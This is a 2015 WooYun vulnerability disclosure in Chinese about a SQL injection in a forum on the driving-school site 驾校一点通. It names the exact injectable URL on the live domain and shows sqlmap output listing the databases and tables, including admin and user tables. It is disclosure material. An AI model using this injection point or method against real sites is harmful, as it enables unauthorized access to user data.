当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-096543
漏洞标题:
驾校一点通一处SQL注射
相关厂商:
驾校一点通
漏洞作者:
叫我阿米
提交时间:
2015-02-12 10:46
修复时间:
2015-03-29 10:48
公开时间:
2015-03-29 10:48
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
5
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-02-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

最近考驾照很痛苦,驾校太墨迹了,就来这个网站上逛了一下

详细说明:

注入点:

http://tieba.jxedt.com/wap/t.asp?/=12&T=1


驾校一点通sqlmap.png


出来的数据库,数据库名字跟域名一样哟

available databases [5]:                                                       
[*] master
[*] model
[*] msdb
[*] tempdb
[*] tieba_jxedt_com


表:

Database: tieba_jxedt_com                                                      
[25 tables]
+------------------------+
| IpLockFlag             |
| IpLockFlag             |
| NotDownload            |
| QiQiBoy_Ad_Disp        |
| QiQiBoy_Admin_Disp     |
| QiQiBoy_Board_Disp     |
| QiQiBoy_Class_Disp     |
| QiQiBoy_Fox_Disp       |
| QiQiBoy_Nlass_Disp     |
| QiQiBoy_Status_Disp    |
| QiQiBoy_System_Disp    |
| QiQiBoy_Topic_Disp     |
| QiQiBoy_Uot_Disp       |
| QiQiBoy_UserGroup_Disp |
| QiQiBoy_User_Disp      |
| dtest                  |
| dtproperties           |
| forTieba               |
| jlfortieba             |
| tb_news                |
| view_Board             |
| view_Topic             |
| zgzksfortieba          |
| tiebajxedtcom.JCZ3Tmp  |
| tiebajxedtcom.JCZTmp   |
+------------------------+

漏洞证明:

已证明

修复方案:

我菜鸟呀

版权声明:转载请注明来源 叫我阿米@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝